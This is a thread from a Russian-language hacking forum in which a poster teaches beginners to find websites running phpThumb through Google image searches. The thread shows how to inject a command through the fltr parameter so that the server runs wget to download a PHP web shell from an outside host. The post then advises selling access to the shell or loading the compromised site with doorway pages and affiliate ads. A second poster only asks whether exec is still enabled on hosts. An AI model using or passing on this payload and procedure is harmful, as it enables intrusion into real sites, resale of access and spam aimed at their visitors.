Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
Показано с 1 по 2 из 2

Тема: phpthumb

  1. #1
    TopicStarter


    Статус
    Offline
    Регистрация
    11.11.2013
    Сообщений
    84
    Репутация
    16 + / -
    Другое

    phpthumb

    Здравствуйте уважаемые новички, речь пойдет о phpThumb это довольно легкий и старый способ заливки шеллов, в нем нам не понадобится знание sql языка,так же не понадобится раскручивать скуль через havij или в ручную , нам не понадобится админка для того что бы залить сам шелл на нужно все го лишь немного времени и старания !!!
    Огромная просьба тех кто уже имеет опыт с работой заливки шеллов через гугл дорк или свои какие либо раскрученные темы не мешать новичкам осваиваться так как тема довольно старая и сайтов в ней не так уж и много.
    И так откроем google картинки и впишем туда например: phpThumb.php
    Гугл выдаст нам большое кол-во картинок открываем картинки в полном размере ( сначало просто кликаем потом нажимаем полный размер )
    Затем у нас будут такие варианты
    /photos/UW/phpThumb.php.jpg
    wp-content/uploads/2007/08/phpthumb.php.jpg
    wordpress/wp-content/themes/eGallery/phpThumb/phpThumb.php?
    Нам подходит 3-вариант он может быть такой либо очень большой но нам не важно что написано после phpThumb, нам может открыться картинка либо ошибка ввиде красной таблички нам все равно что откроется не обращаем внимание, стираем все до первого phpThumb ( wordpress/wp-content/themes/eGallery/phpThumb/ )
    После знака / прописываем ( phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget vkbugs1.narod.ru/sh.php ; &phpThumbDebug=9 )
    У нас вылезет табличка в ней будет текст его вам изучать не обязательно и вникать тоже так как мы учимся, скажу одно если текст длинный это хорошо !
    далее стираем все обратно до phpThumb/ и здесь пишем sh.php жмем enter если все получилось вы перейдете в такую понель ! ыыыыу.png

    Это и есть ваш шелл !!! Доступ к нему это ссылка, после удачной заливки сохраняйте ссылку и можете продать ее или поместить туда дорвеи или рекламу с партнерок что угодно при продаже смотрите на верхний левый угол что бы там была надпись Safe Mod OFF!
    Проверить ваш сайт на наличие тиЦ и pr или даже траффа вы можете на сайте
    [Только зарегистрированные могут видеть это. ] реклама) либо скачать специальный плагин для Firefox этот плагин называется RDS BAR

    Всем спасибо за внимание.

  2. Пользователь сказал cпасибо:
    admin
  3. #2
    Trust
    Аватар для ul1k317

    Статус
    Offline
    Регистрация
    26.08.2013
    Сообщений
    823
    Репутация
    395 + / -
    Web-программист
    wget? Серьезно? На каких-то хостингах еще открыта функа system/exec?
    php, mysql, mssql, js, html, css, ajax, administrating, it consulting, etc.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.